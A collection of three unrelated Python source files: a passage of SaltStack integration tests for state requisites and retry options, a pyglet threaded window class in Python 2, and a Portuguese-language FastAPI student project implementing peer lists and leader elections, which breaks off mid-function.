retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.listen_names',
timeout=self.TIMEOUT)
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
@flaky
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
@skipIf(salt.utils.platform.is_darwin() and six.PY2, 'This test hangs on OS X on Py2')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
rm_files = [os.path.join(TMP, 'nonbase_env'),
os.path.join(TMP, 'testfile'),
os.path.join(TMP, 'test.txt'),
os.path.join(TMP_STATE_TREE, 'top.sls')]
for file_ in rm_files:
if os.path.isfile(file_):
os.remove(file_)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
managed_window.py
|
from pyglet.gl import *
from pyglet.window import Window
from pyglet.clock import Clock
from threading import Thread, Lock
gl_lock = Lock()
class ManagedWindow(Window):
"""
A pyglet window with an event loop which executes automatically
in a separate thread. Behavior is added by creating a subclass
which overrides setup, update, and/or draw.
"""
fps_limit = 30
default_win_args = dict(width=600,
height=500,
vsync=False,
resizable=True)
def __init__(self, **win_args):
"""
It is best not to override this function in the child
class, unless you need to take additional arguments.
Do any OpenGL initialization calls in setup().
"""
# check if this is run from the doctester
if win_args.get('runfromdoctester', False):
return
self.win_args = dict(self.default_win_args, **win_args)
self.Thread = Thread(target=self.__event_loop__)
self.Thread.start()
def __event_loop__(self, **win_args):
"""
The event loop thread function. Do not override or call
directly (it is called by __init__).
"""
gl_lock.acquire()
try:
try:
super(ManagedWindow, self).__init__(**self.win_args)
self.switch_to()
self.setup()
except Exception, e:
print "Window initialization failed: %s" % (str(e))
self.has_exit = True
finally:
gl_lock.release()
clock = Clock()
clock.set_fps_limit(self.fps_limit)
while not self.has_exit:
dt = clock.tick()
gl_lock.acquire()
try:
try:
self.switch_to()
self.dispatch_events()
self.clear()
self.update(dt)
self.draw()
self.flip()
except Exception, e:
print "Uncaught exception in event loop: %s" % str(e)
self.has_exit = True
finally:
gl_lock.release()
super(ManagedWindow, self).close()
def close(self):
"""
Closes the window.
"""
self.has_exit = True
def setup(self):
"""
Called once before the event loop begins.
Override this method in a child class. This
is the best place to put things like OpenGL
initialization calls.
"""
pass
def update(self, dt):
"""
Called before draw during each iteration of
the event loop. dt is the elapsed time in
seconds since the last update. OpenGL rendering
calls are best put in draw() rather than here.
"""
pass
def draw(self):
"""
Called after update during each iteration of
the event loop. Put OpenGL rendering calls
here.
"""
pass
if __name__ == '__main__':
ManagedWindow()
|
main.py
|
import functools
import os
import random
import threading
import time
from dataclasses import dataclass
from datetime import datetime, timedelta
from enum import Enum
from typing import Dict, Iterator, Optional
from uuid import UUID, uuid4
import requests
from fastapi import FastAPI, HTTPException
from fastapi.exception_handlers import request_validation_exception_handler
from fastapi.exceptions import RequestValidationError
from pydantic import BaseModel
from uvicorn import Config, Server
import asyncio
from contextlib import suppress
PORT = int(os.getenv("PORT", "8000"))
app = FastAPI()
class ResolverBody(BaseModel):
operacao: str
arguments: Dict[str, str]
@dataclass
class RecursoBody:
codigo_de_acesso: str
_uuid: Optional[UUID] = None
valor: Optional[int] = None
validade: Optional[datetime] = None
# constructor
def __init__(self, codigo_de_acesso: UUID, valor: int, validade: datetime) -> None:
self._uuid = codigo_de_acesso
self.valor = valor
self.validade = validade
EXPIRACAO = 5
@dataclass
class InfoBody:
server_name: str
server_endpoint: str
descricao: str
versao: float
status: str
tipo_de_eleicao_ativa: str
def __init__(self) -> None:
self.server_name = "sd_microservice"
self.server_endpoint = "https://pratica-sd.herokuapp.com/"
self.descricao = "Projeto de SD. Os seguintes serviços estão implementados. GET: [/, /info, /peers, /peers/{id}, /fruits, /clients]. POST: [/resolver, /peers, /echo]. PUT: [/info, /peers/{id}]. DELETE: [/peer/{id}]"
self.versao = 0.1
self.status = "online"
self.tipo_de_eleicao_ativa = "anel"
def get_atts(self):
return [
self.server_name,
self.server_endpoint,
self.descricao,
self.versao,
self.status,
self.tipo_de_eleicao_ativa,
]
@dataclass
class Valid(Enum):
VALID = 0b00
INVALID = 0b01
DUPLICATE = 0b10
class EleicaoBody(BaseModel):
id: str
dados: Optional[list[str]] = None
@dataclass
class CoordenadorBody:
coordenador: str
id_eleicao: str
recursos: dict[UUID, RecursoBody] = {}
glInfo = InfoBody()
glPeers = [
# {
# "id": "201810665",
# "nome": "Jenilson Ramos Santos",
# "url": "https://jenilsonramos-sd-20211.herokuapp.com/",
# },
# {
# "id": "201720308",
# "nome": "Victor Dos Santos Santana",
# "url": "https://sd-victor-20212.herokuapp.com/",
# },
{
"id": "201720295",
"nome": "Allana Dos Santos Campos",
"url": "https://sd-ascampos-20212.herokuapp.com/",
},
{
"id": "201710396",
"nome": "Robert Morais Santos Broketa",
"url": "https://pratica-sd.herokuapp.com/",
},
{
"id": "201710377",
"nome": "Hiago Rios Cordeiro",
"url": "https://sd-api-uesc.herokuapp.com/",
},
{
"id": "201710376",
"nome": "Guilherme Senna Cruz",
"url": "https://nodejs-sd-guilhermesenna.herokuapp.com/",
},
# {
# "id": "201710375",
# "nome": "Emmanuel Norberto Ribeiro Dos Santos",
# "url": "https://sd-emmanuel.herokuapp.com/",
# },
# {
# "id": "201620400",
# "nome": "Nassim Maron Rihan",
# "url": "https://sd-nassimrihan-2021-2.herokuapp.com/",
# },
# {
# "id": "201610337",
# "nome": "Luís Carlos Santos Câmara",
# "url": "https://sd-20212-luiscarlos.herokuapp.com/",
# },
# {
# "id": "201610327",
# "nome": "João Pedro De Gois Pinto",
# "url": "https://sd-joaopedrop-20212.herokuapp.com/",
# },
# {
# "id": "201512136",
# "nome": "Annya Rita De Souza Ourives",
# "url": "https://sd-annyaourives-20212.herokuapp.com/hello/",
# },
]
myUrl = "https://pratica-sd.herokuapp.com/"
myId = "201710396"
coordenador = {
"coordenador": False,
"coordenador_atual": "",
}
id_eleicao_atual = ""
eleicoes: set[str] = set()
interval_check = 2.0
def is_peer_valid(peer: dict[str, str]) -> Valid:
for (k, v) in peer.items():
if k != "id" and k != "nome" and k != "url":
return Valid.INVALID
if k == "id" or k == "nome" or k == "url":
if k == "nome" and v.isdigit():
return Valid.INVALID
if k == "url" and not v.startswith("http"):
return Valid.INVALID
try:
glPeers.index(peer)
return Valid.DUPLICATE
except ValueError:
return Valid.VALID
@app.get("/")
def index():
return {
"routes": {
"GET": {
"/": "This page",
"/fruits": "List of fruits",
"/clients": "List of Clients",
},
"POST": {
"/echo": "Echoes the passed parameter",
"/resolver": {
"body": {
"resolver": "operacao",
"nome": "name of the person to match a service url",
},
"response": {"url": "url of the service of the matched name"},
},
},
},
}
def recurso_expirou(validade: datetime) -> bool:
return datetime.now() - validade >= timedelta(seconds=EXPIRACAO)
def log(sev: str, comment: str, msg: str):
requests.post(
"https://sd-log-server.herokuapp.com/log",
json={
"from": myUrl,
"severity": sev,
"comment": comment,
"body": msg,
},
)
@app.exception_handler(RequestValidationError)
async def validation_exception_handler(request, exc: RequestValidationError):
print(f"OMG! The client sent invalid data!: {exc.body}")
return await request_validation_exception_handler(request, exc)
@app.put("/tipo_eleicao")
def update_tipo_eleicao(tipo_eleicao: str):
global glInfo
glInfo.tipo_de_eleicao_ativa = tipo_eleicao
return {"tipo_eleicao": tipo_eleicao}
@app.post("/offline/{body}")
def post_offline(body: bool = True):
global glInfo
if body:
glInfo.status = "offline"
else:
glInfo.status = "online"
return {"status": glInfo.status}
@app.get("/eleicao")
def get_eleicao():
return {
"tipo_de_eleicao_ativa": glInfo.tipo_de_eleicao_ativa,
"eleicoes_em_andamento": eleicoes,
}
@app.post("/eleicao")
def post_eleicao(body: EleicaoBody):
if glInfo.status == "offline":
raise HTTPException(status_code=404, detail="Servidor offline")
global coordenador
if glInfo.status == "online" and (
glInfo.tipo_de_eleicao_ativa == "anel" or not eleicoes.__contains__(body.id)
):
eleicoes.add(body.id)
threading.Thread(target=eleicao, args=(body.id, body.dados, True)).start()
return body.dict()
@app.post("/eleicao/coordenador")
def post_eleicao_coordenador(body: CoordenadorBody):
if glInfo.status == "offline":
raise HTTPException(status_code=404, detail="Servidor offline")
global coordenador
coordenador["coordenador_atual"] = body.coordenador
coordenador["coordenador"] = body.coordenador == myId
log(
"Success",
f"Eleicao finalizada",
f"Eleicao: {body.id_eleicao}. Novo coordenador: {body.coordenador}",
)
print(f"Eleicao {body.id_eleicao} finalizada. Novo coordenador: {body.coordenador}")
eleicoes.discard(body.id_eleicao)
@app.post("/resetar")
def resetar_coord():
global coordenador
coordenador["coordenador"] = False
coordenador["coordenador_atual"] = ""
eleicoes.clear()
return {"status": "ok"}
@app.get("/recurso")
def get_recurso(body: RecursoBody):
try:
recurso = recursos.get(UUID(body.codigo_de_acesso))
except ValueError:
raise HTTPException(status_code=401, detail="Chave inválida")
if recurso is None or recurso_expirou(recurso.validade):
raise HTTPException(
status_code=401, detail="Recurso expirado ou não encontrado"
)
return {"valor": recurso.valor}
@app.delete("/recurso")
def delete_recurso(body: RecursoBody):
recurso = recursos.get(UUID(body.codigo_de_acesso))
if recurso is None:
raise HTTPException(status_code=410, detail="Recurso não existe")
if recurso._uuid is not None:
del recursos[recurso._uuid]
if recurso_expirou(recurso.validade):
raise HTTPException(status_code=410, detail="Recurso expirado")
@app.put("/recurso")
def put_recurso(body: RecursoBody):
recurso = recursos.get(UUID(body.codigo_de_acesso))
if recurso is None or recurso_expirou(recurso.validade):
raise HTTPException(
status_code=401, detail="Recurso expirado ou não encontrado"
)
recurso.valor = body.valor
recurso.validade = datetime.now()
if recurso._uuid is not None:
recursos[recurso._uuid] = recurso
return {"codigo_de_acesso": recurso._uuid, "valor": recurso.valor}
@app.post("/recurso")
def post_recurso(body: RecursoBody = None):
if body is None:
uid = uuid4()
validade = datetime.now() + timedelta(seconds=EXPIRACAO)
recursos[uid] = RecursoBody(
codigo_de_acesso=uid,
valor=random.randint(1, 1000),
validade=validade,
)
return {"codigo_de_acesso": uid, "validade": validade}
else:
# get recurso from dict
recurso = recursos.get(UUID(body.codigo_de_acesso))
# raise exception with code 409 if recurso is not None and recurso
# validade is now plus EXPIRACAO seconds
if recurso is not None:
if recurso.validade is not None and not recurso_expirou(recurso.validade):
recurso.validade = datetime.now()
if recurso._uuid is not None:
recursos[recurso._uuid] = recurso
raise HTTPException(status_code=409, detail="Recurso em uso")
if body.valor is not None:
recurso.valor = body.valor
# update recurso validade
recurso.validade = datetime.now()
# update dict
if recurso._uuid is not None:
recursos[recurso._uuid] = recurso
return {
"codigo_de_acesso": recurso._uuid,
"validade": recurso.validade,
}
else:
uid = uuid4()
validade = datetime.now() + timedelta(seconds=EXPIRACAO)
recursos[uid] = RecursoBody(
codigo_de_acesso=uid,
valor=random.randint(1, 1000),
validade=validade,
)
return {"codigo_de_acesso": uid, "validade": validade}
@app.get("/info")
def get_info():
return glInfo
@app.put("/info")
def update_info(body: InfoBody):
if any(
not att or (isinstance(att, float) and att <= 0.0) for att in body.get_atts()
):
raise HTTPException(
status_code=400, detail="A requisição não contem os dados necessários"
)
else:
global glInfo
if glInfo.status == "offline" and body.status == "online":
threading.Thread(target=eleicao, args=("")).start()
glInfo = body
@app.get("/peers")
def get_peers():
return glPeers
@app.get("/peers/{id}")
def get_peer(id: str):
for d in glPeers:
if d.get("id") == id:
return d
raise HTTPException(404, f"Não encontrado peer com id: {id}")
@app.post("/peers")
def add_peer(body: dict[str, str]):
valid = is_peer_valid(body)
if valid.value == Valid.VALID.value:
glPeers.append(body)
elif valid.value == Valid.INVALID.value:
raise HTTPException(400, "Dados mal formatados")
else:
raise HTTPException(409, "Já existe um peer com esse id ou nome")
@app.put("/peers/{id}")
def update_peer(id: str, body: dict[str, str]):
if is_peer_valid(body).value == Valid.INVALID.value:
raise HTTPException(422, f"Dados invalidos")
for d in glPeers:
if d.get("id") == id:
d.update(body)
return body
raise HTTPException(404, f"Não encontrado peer com id: {id}")
@app.delete("/peers/{id}")
def delete_peer(id: str):
idx = -1
for (i, d) in enumerate(glPeers):
if d.get("id") == id:
idx = i
break
if idx == -1:
raise HTTPException(404, f"Não encontrado peer com id: {id}")
glPeers.pop(idx)
@app.post("/resolver")
def resolver(body: ResolverBody):
if body.operacao == "resolver":
nome = body.arguments.get("nome")
if nome is not None and nome.lower() == "robert":
return {"url": "https://pratica-sd.herokuapp.com/"}
@app.get("/coordenador")
def get_coordenador():
return coordenador
@app.get("/fruits")
def app_get():
return ["Apple", "Banana", "Orange"]
@app.get("/clients")
def app_clientes_get():
return ["Mathias", "José", "Thiago"]
@app.post("/echo")
def app_post(echo=None):
if echo is None:
return "Echo."
else:
f"Echo {echo}."
def main():
config = Config(app=app, host="0.0.0.0", port=PORT, debug=True)
server = Server(config=config)
server.run()
global glInfo
if glInfo.status != "offline":
log(
"Attention",
"Servico iniciado",
"O servico foi inicializado, uma eleicao ira ocorrer em breve",
)
eleicao("")
# setInterval(interval_check, check_coordenador)
p = Periodic(check_coordenador, 2)
loop = asyncio.get_event_loop()
loop.run_until_complete(p.start())
def eleicao(
id_eleicao_atual: str, dados: Optional[list[str]] = None, recebido: bool = False
):
if glInfo.status == "offline":
return
if id_eleicao_atual == "":
id_eleicao_atual = uuid4().__str__()
eleicoes.add(id_eleicao_atual)
log(
"Success",
f"{'Recebido' if recebido else 'Iniciado nova'} eleicao",
f"Eleicao: {id_eleicao_atual}. Tipo de eleicao: {glInfo.tipo_de_eleicao_ativa}",
)
print(
f"Iniciando nova eleicao: {id_eleicao_atual}. Tipo: {glInfo.tipo_de_eleicao_ativa}"
)
if glInfo.tipo_de_eleicao_ativa == "anel":
eleicao_ring(id_eleicao_atual, dados)
else:
eleicao_bully(id_eleicao_atual)
def cycle(iterable: Iterator):
it = iter(iterable)
while True:
v = next(it)
if v.get("id") == myId:
break
while True:
try:
yield next(it)
except StopIteration:
it = iter(iterable)
yield next(it)
def eleicao_ring(id_eleicao_atual: str, dados: Optional[list[str]] = None):
global glPeers
print(f"dados: {dados}")
if dados is not None and dados.__contains__(myId):
maxId = functools.reduce(
lambda acc, id: max(int(acc), int(id) if id != "" else 0), dados, 0
)
